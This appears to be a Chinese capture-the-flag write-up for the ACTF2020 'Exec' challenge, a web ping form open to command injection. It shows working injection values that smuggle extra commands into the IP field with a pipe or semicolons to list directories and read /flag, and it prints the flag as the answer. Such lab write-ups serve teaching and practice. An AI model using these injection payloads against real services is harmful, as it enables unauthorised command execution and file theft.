[ACTF2020 新生赛]Exec 1

2023-10-26 16:07:12 浏览数 (1)

题目环境:

是一个ping操作,ping个127.0.0.1试试 有回显结果

看起来有点像PWN的题,猜测通过列出目录文件,是否存在flag文件,并查看文件内容,并且存在两种方法解题,一种是管道符,一种是堆叠查询

第一种、管道符

列出目录文件 127.0.0.1 | ls

列出隐藏文件 127.0.0.1 | ls -a 发现存在上级目录

因此可以看出,此处命令执行并不是在root/根目录下进行的<br />列出/根目录下的目录文件 127.0.0.1 | ls /

存在flag,查看根目录下flag文件的内容 127.0.0.1 | cat /flag

得出flag: **flag{ce0a3875-bc2a-49f9-b285-dccdf195531b}**

第二种、堆叠查询

列出当前目录文件;列出隐藏文件;列出根目录下的文件;查看根目录下flag文件的内容 127.0.0.1;ls;ls -a;ls /;cat /flag

得出flag: **flag{ce0a3875-bc2a-49f9-b285-dccdf195531b}** 两种方法可以看出有明显的不同

0 人点赞